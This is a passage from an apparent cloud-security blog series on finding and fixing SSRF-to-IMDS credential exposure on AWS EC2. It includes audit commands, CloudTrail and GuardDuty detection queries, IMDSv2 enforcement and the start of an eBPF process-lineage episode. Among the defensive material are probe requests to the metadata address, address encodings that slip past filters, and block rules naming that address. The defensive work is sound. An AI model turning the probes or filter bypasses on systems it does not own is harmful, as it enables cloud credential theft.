curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[] | [?MetadataOptions.HttpTokens==`optional`].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table
# Every row in this table is IMDSv1-exposed
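Tests 1 and 2 can also be scripted so they run the same way on every instance, together with the two-step request IMDSv2 expects. A minimal sketch, meant to run on the instance itself: it relies on IMDS answering a token-less GET with HTTP 401 when tokens are required, and IMDS_ENDPOINT is a hypothetical override variable (not an AWS setting) that defaults to the real link-local address.

```bash
#!/usr/bin/env bash
# Run from inside an EC2 instance. IMDS_ENDPOINT is a hypothetical override
# (handy for pointing at a test server); it defaults to the real address.
IMDS_ENDPOINT=${IMDS_ENDPOINT:-http://169.254.169.254}

# Map the HTTP status of a token-less GET to a verdict.
classify_tokenless_status() {
  case $1 in
    200) echo "imdsv1-enabled" ;;    # IMDSv1 answered without a token
    401) echo "imdsv2-required" ;;   # HttpTokens=required rejects token-less calls
    000) echo "no-response" ;;       # curl got no HTTP reply (blocked or timed out)
    *)   echo "unexpected-$1" ;;
  esac
}

# Test 2 as a function: token-less GET, classified by status code.
imds_mode() {
  local code
  code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 2 \
    "$IMDS_ENDPOINT/latest/meta-data/instance-id") || true
  classify_tokenless_status "${code:-000}"
}

# IMDSv2 request: PUT for a session token, then GET with the token header.
imds_v2_get() {
  local path=$1 token
  token=$(curl -s --fail --max-time 2 -X PUT "$IMDS_ENDPOINT/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") || return 1
  curl -s --fail --max-time 2 -H "X-aws-ec2-metadata-token: $token" \
    "$IMDS_ENDPOINT/latest/meta-data/$path"
}
```

On an instance the audit lists as optional, imds_mode prints imdsv1-enabled; after enforcement it should print imdsv2-required, while imds_v2_get instance-id keeps working in both modes.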

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent: there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is the instance role’s session ARN appearing in CloudTrail with a source IP that is not the instance’s own; GetCallerIdentity is often the first such event, because attackers call it to confirm the stolen credentials work.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
INSTANCE_IP="10.0.1.50"  # The address CloudTrail records for this instance: its private IP
                         # when calls go through a VPC endpoint, otherwise its public/NAT IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output json | \
  jq -r --arg role "${DETECTOR_ROLE}" --arg ip "${INSTANCE_IP}" '
    .[] | fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == $role) |
    select(.sourceIPAddress != $ip) |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }'
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.
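The same tell can be checked without jq once events are flattened to tab-separated source IP and ARN pairs. A minimal sketch: it treats a session name of i- followed by hex characters as an instance session (a loose, assumed pattern) and flags any such event whose source IP differs from a single expected address, mirroring INSTANCE_IP above.

```bash
#!/usr/bin/env bash
# True if the ARN is an assumed-role session whose session name looks like
# an EC2 instance ID (loose, assumed pattern: "i-" followed by hex).
is_instance_session() {
  local re='^arn:aws[a-z-]*:sts::[0-9]{12}:assumed-role/[^/]+/i-[0-9a-f]{8,}$'
  [[ $1 =~ $re ]]
}

# Read "sourceIP<TAB>arn" lines on stdin; print the ones where an instance
# session is used from an address other than the expected one.
flag_offhost_instance_creds() {
  local expected_ip=$1 ip arn
  while IFS=$'\t' read -r ip arn; do
    is_instance_session "$arn" || continue
    [[ $ip == "$expected_ip" ]] && continue
    printf '%s\t%s\n' "$ip" "$arn"
  done
}
```

Usage: pipe the lookup-events JSON through jq -r '.[] | fromjson | [.sourceIPAddress, .userIdentity.arn] | @tsv' and then into flag_offhost_instance_creds 10.0.1.50. Calls that AWS services make on the role's behalf record a service name instead of an IP and will also be flagged, so expect to allowlist a few.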

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely, meaning someone has copied the credentials off the instance and is using them from their own system. The companion .InsideAWS variant, also queried below, fires when the credentials are used from a different AWS account.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -r -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.AwsApiCallAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

Recon:IAMUser/UserPermissions — fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Often appears immediately before the data exfiltration events.

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs cannot answer this question directly. AWS lists traffic to and from 169.254.169.254 among the flow-log exclusions, so IMDS calls never appear in flow logs, whether they come from the instance itself or from a container on it. A query like the one below returns no rows even on a compromised instance; treat an empty result as uninformative, not as reassurance:

-- Athena query against VPC flow logs
-- Looks for connections to 169.254.169.254; expect zero rows, because
-- flow logs do not record instance metadata traffic

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

For IMDS-level visibility you need host-level instrumentation, such as an eBPF agent tracing connections to 169.254.169.254 on the node. To confirm that --http-put-response-hop-limit 1 is protecting containers, request a token from inside a container instead: with the limit enforced, the PUT to /latest/api/token times out rather than returning a token.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, IMDS sends its response to the token PUT with an IP TTL of 1. When a process inside a container asks for a token, that response must travel back along:

IMDS endpoint → host network namespace → veth pair → container network namespace

Forwarding the response from the host into the container namespace would take the TTL below 1, so the host kernel drops it. The container never receives a token, and the GET that follows carries none: if --http-tokens required is also set, that GET is rejected; otherwise IMDSv1 still answers it. A hostNetwork pod is the exception: it shares the host's network namespace, no forwarding step occurs, and hop limit 1 does not stop it.

Hop limit = 1:
  Container → veth → host → IMDS   (PUT arrives; token response sent with TTL=1)
  IMDS → host → [TTL exhausted before forwarding into the container; response dropped]
  Container never receives the token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token response survives the one extra forward; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS
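The hop-limit rule reduces to one inequality. IMDS sends the token response with an IP TTL equal to the configured hop limit, and a Linux host only forwards a packet (for example, from the node into a container's network namespace) while its TTL is above 1, decrementing it each time. So the token arrives only when hop_limit > forward_hops. A small bash model of that rule; the forward-hop counts per caller are assumptions for a typical bridge or veth setup.

```bash
#!/usr/bin/env bash
# True if an IMDSv2 token response sent with IP TTL = hop_limit survives
# forward_hops forwarding steps (each needs TTL > 1, then decrements it).
token_delivered() {
  local hop_limit=$1 forward_hops=$2
  (( hop_limit > forward_hops ))
}

# Print a small matrix for common callers (forward-hop counts are assumptions).
print_hop_matrix() {
  local caller hops limit verdict
  for caller in "host-process:0" "hostNetwork-pod:0" "bridged-container:1"; do
    hops=${caller#*:}
    for limit in 1 2; do
      if token_delivered "$limit" "$hops"; then verdict=token; else verdict=dropped; fi
      printf '%-18s hop_limit=%d -> %s\n' "${caller%%:*}" "$limit" "$verdict"
    done
  done
}
```

print_hop_matrix shows the two cases that matter: a bridged container is cut off at hop limit 1 and reconnected at 2, while a hostNetwork pod gets a token at either setting because no forwarding step occurs.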

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity, which eliminates static credentials: pods get short-lived tokens scoped to their service account, not the node’s IAM role.


Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. For workloads on current AWS SDKs the operational cost is near zero (legacy SDKs are the exception; see Production Gotchas), and it closes the GET-based SSRF-to-IMDS credential chain.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all running or stopped instances in a
# region where HttpTokens is currently "optional"
aws ec2 describe-instances \
  --filters Name=instance-state-name,Values=running,stopped \
  --query 'Reservations[].Instances[] | [?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read -r instance_id; do
    [ -n "$instance_id" ] || continue
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Attach this SCP to the OUs that hold your workload accounts; SCPs never restrict the management account, so do not run workloads there. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity removes the credential itself from the picture: the instance no longer carries an application-level IAM role, so there is nothing worth retrieving through SSRF.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials
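A quick way to see which path a pod's SDK is likely to take is to look at the environment variables the identity mechanisms inject: IRSA sets AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN_FILE, and EKS Pod Identity sets AWS_CONTAINER_CREDENTIALS_FULL_URI. A rough sketch, assuming the usual SDK precedence (static environment keys, then web identity, then container credentials, then IMDS) and ignoring shared config files and other providers.

```bash
#!/usr/bin/env bash
# Approximate which credential source the AWS SDK default chain would use,
# based only on environment variables (simplified precedence, see lead-in).
credential_source() {
  if [[ -n ${AWS_ACCESS_KEY_ID:-} && -n ${AWS_SECRET_ACCESS_KEY:-} ]]; then
    echo "static-env-keys"          # long-lived keys in env: worst case
  elif [[ -n ${AWS_WEB_IDENTITY_TOKEN_FILE:-} && -n ${AWS_ROLE_ARN:-} ]]; then
    echo "irsa-web-identity"        # IRSA: projected service account token
  elif [[ -n ${AWS_CONTAINER_CREDENTIALS_FULL_URI:-} ]]; then
    echo "container-credentials"    # EKS Pod Identity (or ECS full-URI mode)
  else
    echo "imds-fallback"            # SDK would fall through to the node's IMDS
  fi
}
```

Inside a pod, imds-fallback means the SDK would reach for the node's IMDS, which is exactly the path IMDSv2 enforcement and hop limit 1 are meant to close.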

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defense in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "URL_DECODE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.
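The WAF rule above matches the literal string only. Clients that hand the host to the system's address parser (curl is one) also accept the same address written as the decimal integer 2852039166 or as hex 0xA9FEA9FE, and naive host extraction can be fooled by userinfo (http://user@169.254.169.254/). A minimal sketch of an application-side check, assuming bash 4+, that normalizes those literal forms before testing for 169.254.0.0/16, fails closed on IPv6 literals and on numeric-looking hosts it cannot parse, and does not resolve hostnames, so it does not stop DNS-based bypasses on its own.

```bash
#!/usr/bin/env bash
# Extract the host from a URL: drop scheme, path/query/fragment, userinfo, port.
url_host() {
  local rest=${1#*://}
  rest=${rest%%[/?#]*}
  rest=${rest##*@}
  if [[ $rest == \[* ]]; then              # bracketed IPv6 literal
    rest=${rest#\[}
    printf '%s\n' "${rest%%\]*}"
  else
    printf '%s\n' "${rest%%:*}"
  fi
}

# Print a literal IPv4 host as a 32-bit integer. Accepts dotted decimal,
# a plain decimal integer (2852039166) or 0x-hex (0xA9FEA9FE); returns 1
# for anything else, including hostnames and octal-style forms.
ipv4_to_int() {
  local h=$1
  local re_dotted='^(0|[1-9][0-9]{0,2})\.(0|[1-9][0-9]{0,2})\.(0|[1-9][0-9]{0,2})\.(0|[1-9][0-9]{0,2})$'
  local re_dec='^[1-9][0-9]{0,9}$' re_hex='^0[xX][0-9a-fA-F]{1,8}$'
  if [[ $h =~ $re_dotted ]]; then
    local a=${BASH_REMATCH[1]} b=${BASH_REMATCH[2]} c=${BASH_REMATCH[3]} d=${BASH_REMATCH[4]}
    (( a <= 255 && b <= 255 && c <= 255 && d <= 255 )) || return 1
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
  elif [[ $h =~ $re_dec ]]; then
    (( h <= 4294967295 )) || return 1
    echo $(( h ))
  elif [[ $h =~ $re_hex ]]; then
    echo $(( h ))
  else
    return 1
  fi
}

# True if the application should refuse to fetch this URL.
should_block_url() {
  local host ip re_numeric='^[0-9][0-9a-fx.]*$'
  host=$(url_host "$1")
  host=${host,,}                        # lowercase (bash 4+)
  # Any IPv6 literal, including the IMDS address fd00:ec2::254 and
  # IPv4-mapped forms, is blocked: this sketch does not parse IPv6.
  [[ $host == *:* ]] && return 0
  if ip=$(ipv4_to_int "$host"); then
    (( (ip >> 16) == 0xA9FE ))          # 169.254.0.0/16, which holds IMDS
    return
  fi
  # Fail closed on numeric-looking hosts the parser rejected (octal, short forms).
  [[ $host =~ $re_numeric ]] && return 0
  return 1   # a hostname: the caller must resolve it and re-check the address
}
```

The design choice is to fail closed on anything ambiguous. A check like this belongs next to, not instead of, IMDSv2: it only blocks one address range, and an allowlist of expected destinations is stronger wherever the feature permits one.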


⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. AWS SDK for Java v1 before 1.11.678 and AWS SDK for Python before boto3 1.9.220 do not support IMDSv2. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions; that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Requires >= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default
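The checks above still leave a version comparison to do by eye. A minimal sketch of that comparison, assuming GNU sort -V is available (BusyBox or older BSD sort may lack -V), checked against the minimums stated above (boto3 1.9.220, AWS SDK for Java v1 1.11.678).

```bash
#!/usr/bin/env bash
# True if version $1 >= version $2, using GNU `sort -V` ordering.
version_ge() {
  [[ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n1)" == "$2" ]]
}

# Report whether the local boto3 is new enough for IMDSv2 (>= 1.9.220).
check_boto3_imdsv2() {
  local v
  v=$(python3 -c 'import boto3; print(boto3.__version__)' 2>/dev/null) || {
    echo "boto3 not importable"; return 2; }
  if version_ge "$v" 1.9.220; then
    echo "boto3 $v: supports IMDSv2"
  else
    echo "boto3 $v: upgrade before enforcing --http-tokens required"
    return 1
  fi
}
```

The same version_ge call works on the Implementation-Version values printed by the jar loop, compared against 1.11.678.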

EKS node groups and hop limit 2. If you run EKS and pods use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS; they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. EKS managed node groups (aws eks create-nodegroup) default to hop limit 2 for this reason; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

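# EventBridge rule: match GetObject data events made with MyApplicationRole's session
# (complements GuardDuty's delayed finding). Requires S3 data events on a CloudTrail
# trail and a target (aws events put-targets) to deliver the alert; narrow the pattern
# further (for example on sourceIPAddress) so that only unexpected callers match.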
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that obtain credentials some other way (for example, OIDC federation) and make no SDK calls to IMDS are candidates for full endpoint disablement.


Quick Reference

IMDSv1 vs IMDSv2

Attribute | IMDSv1 | IMDSv2
Authentication | None: any HTTP GET works | A PUT to /latest/api/token is required first to obtain a session token
SSRF exploitable | Yes: one HTTP request returns credentials | No, in standard flows: a GET-only SSRF cannot issue the PUT or attach the X-aws-ec2-metadata-token header to the follow-up GET
Session token TTL | N/A | 1 second to 21,600 seconds (configurable)
Hop limit enforcement | N/A | Enforced on the PUT response: a hop limit (IP TTL) of 1 blocks containers from reaching IMDS
AWS CLI enforcement | --http-tokens optional (the default on older instances) | --http-tokens required
Capital One risk | Present | Eliminated
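The two-step IMDSv2 flow in the table can be sketched with Python's standard library. This is a minimal sketch, assuming it runs on an EC2 instance: the two builder functions only construct the requests, and only fetch() sends them. The PUT, and the token header on the follow-up GET, are exactly what a GET-only SSRF primitive cannot produce.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def imdsv2_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: PUT /latest/api/token with the TTL header (1 to 21,600 seconds)."""
    if not 1 <= ttl_seconds <= 21600:
        raise ValueError("IMDSv2 token TTL must be between 1 and 21600 seconds")
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def imdsv2_metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: GET a metadata path, presenting the session token as a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path.lstrip('/')}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch(path: str, timeout: float = 2.0) -> str:
    """Run both steps; only works from inside an EC2 instance."""
    with urllib.request.urlopen(imdsv2_token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    with urllib.request.urlopen(imdsv2_metadata_request(path, token), timeout=timeout) as resp:
        return resp.read().decode()
```

With IMDSv1 the second request alone would succeed without the header; with --http-tokens required it is rejected unless step 1 ran first.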

IMDSv2 Enforcement Commands by Provider

Provider | Enforcement command | Scope
AWS, running instance | aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1 | Single instance
AWS, launch template | Add "MetadataOptions": {"HttpTokens": "required"} to the launch template data | All instances launched from the template
AWS, org SCP | Deny ec2:RunInstances where ec2:MetadataHttpTokens != required | All accounts in the org
AWS, Config rule | ec2-imdsv2-check managed rule | Compliance audit
GCP | No unauthenticated IMDS equivalent: the metadata server requires the Metadata-Flavor: Google header, which SSRF cannot set in most frameworks | N/A
Azure | Azure IMDS requires the Metadata: true header, which browser and SSRF requests typically cannot set; managed identity tokens are served from a separate IMDS path (/metadata/identity/oauth2/token) that requires the same header | N/A

Note on GCP and Azure: both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be set explicitly by the calling code; browsers and plain curl requests do not add them. This does not make SSRF harmless on GCP or Azure: an SSRF primitive that lets the attacker control request headers still reaches the metadata service, and SSRF can still reach other internal services. But the credential exfiltration path is harder than with IMDSv1.


Key Takeaways

  • IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
  • The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
  • --http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
  • GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
  • The structural solution eliminates the credential entirely: with OIDC workload identity on EKS/GKE, pods get scoped, short-lived tokens and the node’s instance role carries no application permissions, so even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Process Lineage — Reconstructing What Happened After the Fact

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13


Architecture Overview

[Figure: eBPF process lineage, kernel-level process ancestry tracking for runtime security forensics. eBPF tracks every exec() and fork() in the kernel, reconstructing the full process tree for forensic attribution.]

TL;DR

  • Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
    (kprobe on fork/exec = an eBPF program that fires every time the kernel runs fork() or execve(), capturing process name, PID, parent PID, and arguments inside the kernel, before a process in the container has any chance to hide or rewrite the record)
  • Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
  • The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
  • Tetragon and Falco both build process lineage from kernel events; the difference is where the tree lives: Tetragon keeps a kernel-side process cache in BPF maps, while Falco reconstructs lineage in userspace from its syscall event stream
  • Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
  • Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node: verify exec tracing is available (stops after 10 seconds)
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}
interval:s:10 { exit(); }'

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output (simplified; real events carry additional fields such as exec_id and parent_exec_id):

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

